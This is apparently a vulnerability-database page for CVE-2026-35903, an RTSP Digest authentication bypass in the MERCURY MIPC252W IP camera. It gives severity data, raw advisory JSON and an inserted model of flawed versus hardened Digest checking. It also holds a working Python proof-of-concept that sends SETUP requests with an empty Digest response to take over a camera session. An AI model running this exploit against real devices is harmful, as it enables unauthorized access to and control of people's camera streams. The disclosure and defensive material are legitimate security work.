Security Vulnerability Report
CVE-2026-35903 CVSS 9.8 CRITICAL

Published: 2026-04-27 19:16:53
Last Modified: 2026-05-05 13:39:47

Description

MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response.
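An added example, not code from the advisory or the vendor: a minimal server-side model of the flaw described above, placing a check that only matches nonce and session beside one that recomputes the RFC 2617 Digest response on every request. The credential store, password, nonce and session values are constructed placeholders, and all function names are hypothetical.

```python
import hashlib
import hmac
import re

# Constructed sample values; none of them come from the device or the advisory.
USERS = {"admin": "example-password"}     # hypothetical credential store
REALM = "MERCURY"
SESSIONS = {"12345678": "abc123"}         # session id -> nonce issued at DESCRIBE
URI = "rtsp://192.168.1.10:554/trackID=1"

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def parse_digest(header):
    """Split a 'Digest k="v", ...' Authorization value into a dict."""
    if not header.startswith("Digest "):
        return {}
    return dict(re.findall(r'(\w+)="([^"]*)"', header))

def expected_response(user, password, method, uri, nonce):
    """RFC 2617 response without qop: MD5(HA1:nonce:HA2)."""
    ha1 = md5_hex(f"{user}:{REALM}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")      # binds the response to method and URI
    return md5_hex(f"{ha1}:{nonce}:{ha2}")

def check_session_only(method, session, header):
    """Flawed model: nonce and session must match, response is never read."""
    nonce = parse_digest(header).get("nonce")
    return nonce is not None and SESSIONS.get(session) == nonce

def check_every_request(method, session, header):
    """Hardened model: recompute and compare the Digest response each time."""
    f = parse_digest(header)
    password = USERS.get(f.get("username", ""))
    if password is None or f.get("realm") != REALM:
        return False
    if session not in SESSIONS or SESSIONS[session] != f.get("nonce"):
        return False
    want = expected_response(f["username"], password, method, f.get("uri", ""), f["nonce"])
    return hmac.compare_digest(want.encode(), f.get("response", "").lower().encode())

def auth_header(response):
    """Build a sample Authorization value with the given response field."""
    return (f'Digest username="admin", realm="{REALM}", nonce="abc123", '
            f'uri="{URI}", response="{response}"')

GOOD = auth_header(expected_response("admin", USERS["admin"], "SETUP", URI, "abc123"))
EMPTY = auth_header("")
```

Because HA2 covers the method and URI, a response computed for SETUP is rejected by the hardened check when presented with PLAY. Without `qop` and a nonce count, the same method and URI can still be replayed while the nonce remains valid, so nonce lifetime should be kept short.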

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:* - NOT VULNERABLE
MERCURY MIPC252W 1.0.5 Build 230306 Rel.79931n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Target Configuration
TARGET_IP = "192.168.1.10"
TARGET_PORT = 554

# This PoC demonstrates the authentication bypass.
# Step 1: Attacker establishes a session or captures valid nonce/session ID.
# Step 2: Attacker sends RTSP commands with valid nonce/session but INVALID response.
def exploit_rtsp_bypass():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((TARGET_IP, TARGET_PORT))

    # Initial DESCRIBE request to get the Nonce (Assuming we can sniff or have credentials for this step)
    # In a real attack, this phase requires one valid auth or network sniffing.
    req1 = "DESCRIBE rtsp://" + TARGET_IP + ":554/ RTSP/1.0\r\nCSeq: 1\r\nUser-Agent: Python/RTSP\r\n\r\n"
    sock.send(req1.encode())
    resp1 = sock.recv(4096).decode()
    print("[+] Initial Response:", resp1.split('\r\n')[0])

    # Assume we extracted Nonce: "abc123" and Realm: "MERCURY" from resp1
    # And we performed a valid auth to get Session: "12345678"
    # Now we attempt to send a SETUP command with an EMPTY response parameter.

    # Malicious Authorization Header: Response is empty, but Nonce/Session are valid
    # This exploits the vulnerability: device checks Nonce/Session but ignores Response.
    malicious_auth = 'Digest username="admin", realm="MERCURY", nonce="abc123", uri="rtsp://192.168.1.10:554/", response=""'

    # Sending SETUP request to exploit the bypass
    exploit_req = (
        "SETUP rtsp://" + TARGET_IP + ":554/trackID=1 RTSP/1.0\r\n"
        "CSeq: 2\r\n"
        "Session: 12345678\r\n"
        "Authorization: " + malicious_auth + "\r\n"
        "Transport: RTP/AVP;unicast;client_port=5000-5001\r\n"
        "\r\n"
    )

    print("[*] Sending Exploit Request with empty Digest response...")
    sock.send(exploit_req.encode())
    resp2 = sock.recv(4096).decode()
    print("[+] Exploit Response:", resp2.split('\r\n')[0])

    if "200 OK" in resp2:
        print("[!] VULNERABILITY CONFIRMED: Authentication bypassed!")
    else:
        print("[-] Attack failed or patched.")

    sock.close()

if __name__ == "__main__":
    exploit_rtsp_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35903", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:52.817", "lastModified": "2026-05-05T13:39:47.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}